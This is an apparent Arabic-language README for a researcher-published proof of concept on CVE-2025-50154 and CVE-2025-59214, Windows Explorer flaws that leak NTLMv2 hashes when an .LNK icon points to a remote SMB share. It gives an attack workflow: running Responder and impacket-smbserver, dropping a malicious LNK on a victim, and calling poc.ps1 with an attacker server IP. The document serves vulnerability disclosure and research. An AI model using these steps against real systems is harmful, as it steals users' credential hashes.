
POCs الخاصة بـ CVE-2025-50154 وCVE-2025-59214، ثغرات يوم الصفر في مستكشف ملفات ويندوز تكشف عن NTLMv2-SSP دون تفاعل المستخدم. إنها تجاوز للتصحيح الأمني CVE-2025-24054.
بقلم Ruben Enkaoua و Cymulate
المدونة الأولى: نقرة صفرية، NTLM واحد: تجاوز تصحيح مايكروسوفت الأمني (CVE-2025-50154)
المدونة الثانية: تم تصحيحه مرتين، وما زال يتم تجاوزه: تسريب NTLM جديد (تجاوز تصحيح CVE-2025-50154)
الثغرة الأصلية، التي تم تصحيحها مؤخرًا، كانت كشفًا لتجزئة NTLM بنقرة صفرية (0-click) يحدث عندما يعرض explorer.exe أيقونة ملف اختصار .LNK تكون أيقونته مستضافة على خادم SMB بعيد.
بعد التصحيح، لم يعد explorer.exe يحمّل الأيقونات من مسارات SMB البعيدة، مما يمنع الكشف التلقائي عن تجزئات NTLM.
تحديث: لم يعمل التصحيح الخاص بـ CVE-2025-50154 على الإطلاق. أبلغنا عنه، وتم تعيين CVE جديد للثغرة: CVE-2025-59214. مادة الإثبات (POC) ذات صلة بكلا CVE.
عبر إنشاء ملف .LNK يحتوي على:
ستظل عملية explorer.exe تجلب الملف البعيد لاستخراج أيقونة PE من موارد RT_GROUP_ICON و RT_ICON الخاصة به.
شغّل خادم Responder على خادمك. أنشئ ملف LNK ضارًا باستخدام powershell على جهاز مختلف، ثم قم بإسقاطه على الضحية (تنزيل ضار، رفع عبر SMB...). ستقوم عملية explorer.exe بعرض الأيقونة عن طريق تنزيل الملف تلقائيًا، باحثةً عن ترويسات RT_ICON و RT_GROUP_ICON في قسم .rsrc. هذا الكود لأغراض تعليمية وبحثية فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا الكود.
# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"